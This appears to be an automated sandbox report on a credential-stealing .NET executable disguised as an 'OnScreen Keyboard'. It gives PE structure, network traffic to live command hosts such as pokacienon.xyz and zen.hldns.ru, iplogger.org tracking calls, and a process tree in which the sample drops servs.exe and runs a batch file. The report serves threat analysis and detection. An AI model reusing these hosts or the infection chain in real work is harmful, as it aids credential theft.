IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x140000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa6214	0xa6400	False	0.793256578947	data	7.52934612956	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.sdata	0xaa000	0x1e8	0x200	False	0.861328125	data	6.62071125779	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xac000	0x930e4	0x93200	False	0.788572974193	data	7.43452992923	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x140000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xac314	0xe16f	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0xba484	0x10828	dBase III DBT, version number 0, next free block index 40
RT_ICON	0xcacac	0x94a8	data
RT_ICON	0xd4154	0x5488	data
RT_ICON	0xd95dc	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 16580607, next used block 4294917888
RT_ICON	0xdd804	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
RT_ICON	0xdfdac	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
RT_ICON	0xe0e54	0x988	data
RT_ICON	0xe17dc	0x468	GLS_BINARY_LSB_FIRST
RT_RCDATA	0xe1c44	0x5cebf	Microsoft PowerPoint 2007+
RT_GROUP_ICON	0x13eb04	0x84	data
RT_VERSION	0x13eb88	0x370	data
RT_MANIFEST	0x13eef8	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2015 - 2021
Assembly Version	1.0.0.0
InternalName	7sPlt.exe
FileVersion	1.0.0.0
CompanyName	MicroStar Ltd.
LegalTrademarks
Comments
ProductName	OnScreen Keyboard
ProductVersion	1.0.0.0
FileDescription	OnScreen Keyboard
OriginalFilename	7sPlt.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2021 11:00:58.956720114 CEST	49714	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:00:58.996999025 CEST	80	49714	79.141.170.43	192.168.2.6
Apr 8, 2021 11:00:58.997137070 CEST	49714	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:00:59.430593014 CEST	49714	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:00:59.470642090 CEST	80	49714	79.141.170.43	192.168.2.6
Apr 8, 2021 11:00:59.471041918 CEST	80	49714	79.141.170.43	192.168.2.6
Apr 8, 2021 11:00:59.471594095 CEST	49714	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:00:59.550827980 CEST	80	49714	79.141.170.43	192.168.2.6
Apr 8, 2021 11:00:59.639388084 CEST	80	49714	79.141.170.43	192.168.2.6
Apr 8, 2021 11:00:59.738761902 CEST	49714	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.550508976 CEST	49714	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.590594053 CEST	80	49714	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.590717077 CEST	49714	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.627060890 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.666601896 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.666758060 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.668137074 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.707577944 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.707602024 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.708883047 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.748747110 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.748768091 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.748779058 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.748889923 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.748980045 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.788661957 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.788819075 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.789352894 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.789366961 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.789457083 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.789551020 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.789624929 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.789828062 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.789891005 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.790095091 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.790148973 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.828510046 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.828531027 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.828677893 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.828677893 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.828696012 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.828819036 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.828881025 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.828918934 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.828984976 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.829140902 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.829289913 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.829339027 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.829350948 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.829358101 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.829562902 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.829598904 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.829632998 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.829792023 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.830076933 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.830137968 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.830563068 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.830626011 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.868381023 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.868403912 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.868441105 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.868556023 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.868622065 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.868674994 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.868686914 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.868818045 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.868891954 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.868927956 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.868937016 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.868944883 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.869024038 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.869087934 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.869110107 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.869148970 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.869303942 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.869317055 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.869395971 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.869416952 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.869606018 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.869678020 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.869759083 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.869801044 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.869837999 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.869903088 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.870045900 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.870084047 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.870157957 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.870294094 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.870399952 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.870480061 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.870518923 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.870621920 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.870634079 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.870692015 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.870815039 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.871017933 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.871104956 CEST	49718	80	192.168.2.6	79.141.170.43
Apr 8, 2021 11:01:09.871174097 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.871248960 CEST	80	49718	79.141.170.43	192.168.2.6
Apr 8, 2021 11:01:09.871325970 CEST	49718	80	192.168.2.6	79.141.170.43

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 8, 2021 11:00:58.908482075 CEST	192.168.2.6	8.8.8.8	0x549f	Standard query (0)	pokacienon.xyz	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:01.441210985 CEST	192.168.2.6	8.8.8.8	0x6a84	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:01.470119953 CEST	192.168.2.6	8.8.8.8	0xa95c	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:09.605423927 CEST	192.168.2.6	8.8.8.8	0x4c3b	Standard query (0)	pokacienon.xyz	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:10.873883963 CEST	192.168.2.6	8.8.8.8	0x5173	Standard query (0)	pokacienon.xyz	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:12.896653891 CEST	192.168.2.6	8.8.8.8	0xeb73	Standard query (0)	iplogger.org	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:13.164446115 CEST	192.168.2.6	8.8.8.8	0xb9e1	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:13.687160969 CEST	192.168.2.6	8.8.8.8	0x39a9	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:13.715179920 CEST	192.168.2.6	8.8.8.8	0x7fcd	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:14.072782040 CEST	192.168.2.6	8.8.8.8	0x4e61	Standard query (0)	iplogger.org	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:23.441256046 CEST	192.168.2.6	8.8.8.8	0x2f5	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:23.919025898 CEST	192.168.2.6	8.8.8.8	0x2be7	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:23.942229033 CEST	192.168.2.6	8.8.8.8	0xc974	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:24.246023893 CEST	192.168.2.6	8.8.8.8	0xb730	Standard query (0)	iplogger.org	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:24.472491026 CEST	192.168.2.6	8.8.8.8	0x5dad	Standard query (0)	iplogger.org	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:31.886292934 CEST	192.168.2.6	8.8.8.8	0xd143	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:33.452742100 CEST	192.168.2.6	8.8.8.8	0x69e	Standard query (0)	pokacienon.xyz	A (IP address)	IN (0x0001)
Apr 8, 2021 11:02:26.098416090 CEST	192.168.2.6	8.8.8.8	0xc468	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Apr 8, 2021 11:02:26.173938036 CEST	192.168.2.6	8.8.8.8	0x89a5	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Apr 8, 2021 11:02:34.126991034 CEST	192.168.2.6	8.8.8.8	0x8a6e	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Apr 8, 2021 11:02:34.200829983 CEST	192.168.2.6	8.8.8.8	0x61be	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Apr 8, 2021 11:02:36.898296118 CEST	192.168.2.6	8.8.8.8	0xcc2a	Standard query (0)	zen.hldns.ru	A (IP address)	IN (0x0001)
Apr 8, 2021 11:02:42.345851898 CEST	192.168.2.6	8.8.8.8	0x7e6f	Standard query (0)	zen.hldns.ru	A (IP address)	IN (0x0001)
Apr 8, 2021 11:02:48.355720997 CEST	192.168.2.6	8.8.8.8	0x6e88	Standard query (0)	zen.hldns.ru	A (IP address)	IN (0x0001)
Apr 8, 2021 11:02:53.696664095 CEST	192.168.2.6	8.8.8.8	0x75f7	Standard query (0)	zen.hldns.ru	A (IP address)	IN (0x0001)
Apr 8, 2021 11:02:59.035609007 CEST	192.168.2.6	8.8.8.8	0x1902	Standard query (0)	zen.hldns.ru	A (IP address)	IN (0x0001)
Apr 8, 2021 11:03:04.394087076 CEST	192.168.2.6	8.8.8.8	0xeb74	Standard query (0)	zen.hldns.ru	A (IP address)	IN (0x0001)
Apr 8, 2021 11:03:09.744370937 CEST	192.168.2.6	8.8.8.8	0x4c5d	Standard query (0)	zen.hldns.ru	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 8, 2021 11:00:58.937181950 CEST	8.8.8.8	192.168.2.6	0x549f	No error (0)	pokacienon.xyz		79.141.170.43	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:01.463902950 CEST	8.8.8.8	192.168.2.6	0x6a84	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Apr 8, 2021 11:01:01.503354073 CEST	8.8.8.8	192.168.2.6	0xa95c	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Apr 8, 2021 11:01:09.625108957 CEST	8.8.8.8	192.168.2.6	0x4c3b	No error (0)	pokacienon.xyz		79.141.170.43	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:10.902868986 CEST	8.8.8.8	192.168.2.6	0x5173	No error (0)	pokacienon.xyz		79.141.170.43	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:12.909765959 CEST	8.8.8.8	192.168.2.6	0xeb73	No error (0)	iplogger.org		88.99.66.31	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:13.179121971 CEST	8.8.8.8	192.168.2.6	0xb9e1	No error (0)	bitbucket.org		104.192.141.1	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:13.700407982 CEST	8.8.8.8	192.168.2.6	0x39a9	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Apr 8, 2021 11:01:13.700407982 CEST	8.8.8.8	192.168.2.6	0x39a9	No error (0)	s3-1-w.amazonaws.com		52.216.141.204	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:13.728033066 CEST	8.8.8.8	192.168.2.6	0x7fcd	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Apr 8, 2021 11:01:13.728033066 CEST	8.8.8.8	192.168.2.6	0x7fcd	No error (0)	s3-1-w.amazonaws.com		52.216.114.155	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:14.085381031 CEST	8.8.8.8	192.168.2.6	0x4e61	No error (0)	iplogger.org		88.99.66.31	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:23.455394030 CEST	8.8.8.8	192.168.2.6	0x2f5	No error (0)	bitbucket.org		104.192.141.1	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:23.933856010 CEST	8.8.8.8	192.168.2.6	0x2be7	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Apr 8, 2021 11:01:23.933856010 CEST	8.8.8.8	192.168.2.6	0x2be7	No error (0)	s3-1-w.amazonaws.com		52.216.179.59	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:23.956947088 CEST	8.8.8.8	192.168.2.6	0xc974	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Apr 8, 2021 11:01:23.956947088 CEST	8.8.8.8	192.168.2.6	0xc974	No error (0)	s3-1-w.amazonaws.com		52.216.179.59	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:24.259149075 CEST	8.8.8.8	192.168.2.6	0xb730	No error (0)	iplogger.org		88.99.66.31	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:24.484934092 CEST	8.8.8.8	192.168.2.6	0x5dad	No error (0)	iplogger.org		88.99.66.31	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:31.904845953 CEST	8.8.8.8	192.168.2.6	0xd143	No error (0)	bitbucket.org		104.192.141.1	A (IP address)	IN (0x0001)
Apr 8, 2021 11:01:33.465847015 CEST	8.8.8.8	192.168.2.6	0x69e	No error (0)	pokacienon.xyz		79.141.170.43	A (IP address)	IN (0x0001)
Apr 8, 2021 11:02:26.130142927 CEST	8.8.8.8	192.168.2.6	0xc468	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Apr 8, 2021 11:02:26.187233925 CEST	8.8.8.8	192.168.2.6	0x89a5	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Apr 8, 2021 11:02:34.140256882 CEST	8.8.8.8	192.168.2.6	0x8a6e	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Apr 8, 2021 11:02:34.220997095 CEST	8.8.8.8	192.168.2.6	0x61be	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Apr 8, 2021 11:02:37.012821913 CEST	8.8.8.8	192.168.2.6	0xcc2a	No error (0)	zen.hldns.ru		194.169.163.42	A (IP address)	IN (0x0001)
Apr 8, 2021 11:02:42.358545065 CEST	8.8.8.8	192.168.2.6	0x7e6f	No error (0)	zen.hldns.ru		194.169.163.42	A (IP address)	IN (0x0001)
Apr 8, 2021 11:02:48.368587017 CEST	8.8.8.8	192.168.2.6	0x6e88	No error (0)	zen.hldns.ru		194.169.163.42	A (IP address)	IN (0x0001)
Apr 8, 2021 11:02:53.709455013 CEST	8.8.8.8	192.168.2.6	0x75f7	No error (0)	zen.hldns.ru		194.169.163.42	A (IP address)	IN (0x0001)
Apr 8, 2021 11:02:59.073915958 CEST	8.8.8.8	192.168.2.6	0x1902	No error (0)	zen.hldns.ru		194.169.163.42	A (IP address)	IN (0x0001)
Apr 8, 2021 11:03:04.408829927 CEST	8.8.8.8	192.168.2.6	0xeb74	No error (0)	zen.hldns.ru		194.169.163.42	A (IP address)	IN (0x0001)
Apr 8, 2021 11:03:09.800203085 CEST	8.8.8.8	192.168.2.6	0x4c5d	No error (0)	zen.hldns.ru		194.169.163.42	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

pokacienon.xyz

86.107.197.8:38214

195.54.160.9:32972

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: 1wOdXavtlE.exe PID: 6844 Parent PID: 6084

General

Start time:	11:00:29
Start date:	08/04/2021
Path:	C:\Users\user\Desktop\1wOdXavtlE.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\1wOdXavtlE.exe'
Imagebase:	0x2a0000
File size:	1285632 bytes
MD5 hash:	A7E67E6ABD539AEDDBB9021D23F6F217
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.350278531.0000000002CCA000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: svchost.exe PID: 6904 Parent PID: 560

General

Start time:	11:00:30
Start date:	08/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: 1wOdXavtlE.exe PID: 6980 Parent PID: 6844

General

Start time:	11:00:39
Start date:	08/04/2021
Path:	C:\Users\user\Desktop\1wOdXavtlE.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0x740000
File size:	1285632 bytes
MD5 hash:	A7E67E6ABD539AEDDBB9021D23F6F217
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: svchost.exe PID: 3252 Parent PID: 560

General

Start time:	11:00:55
Start date:	08/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 6692 Parent PID: 560

General

Start time:	11:01:08
Start date:	08/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 6732 Parent PID: 6980

General

Start time:	11:01:12
Start date:	08/04/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tncg7
Imagebase:	0x7ff721e20000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 6864 Parent PID: 6980

General

Start time:	11:01:12
Start date:	08/04/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tsTg7
Imagebase:	0x7ff721e20000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 6852 Parent PID: 6732

General

Start time:	11:01:13
Start date:	08/04/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6732 CREDAT:17410 /prefetch:2
Imagebase:	0xb50000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 7016 Parent PID: 560

General

Start time:	11:01:18
Start date:	08/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: servs.exe PID: 2924 Parent PID: 6980

General

Start time:	11:01:23
Start date:	08/04/2021
Path:	C:\Users\user\AppData\Local\Temp\servs.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\servs.exe'
Imagebase:	0x400000
File size:	11238733 bytes
MD5 hash:	6DF7008811F88EEB253064A99C79F234
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 52%, ReversingLabs
Reputation:	low

Analysis Process: iexplore.exe PID: 5872 Parent PID: 6732

General

Start time:	11:01:23
Start date:	08/04/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6732 CREDAT:82946 /prefetch:2
Imagebase:	0xb50000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: servs.tmp PID: 6552 Parent PID: 2924

General

Start time:	11:01:25
Start date:	08/04/2021
Path:	C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp' /SL5='$104D8,10541093,724480,C:\Users\user\AppData\Local\Temp\servs.exe'
Imagebase:	0x400000
File size:	2535424 bytes
MD5 hash:	C1B49299EB51AFA1264D69FC022BB49B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 4%, ReversingLabs
Reputation:	low

Analysis Process: cmd.exe PID: 6396 Parent PID: 6552

General

Start time:	11:01:30
Start date:	08/04/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\cmd.exe' /C ''C:\ProgramData\uacwev.bat''
Imagebase:	0x7ff7180e0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 4996 Parent PID: 6396

General

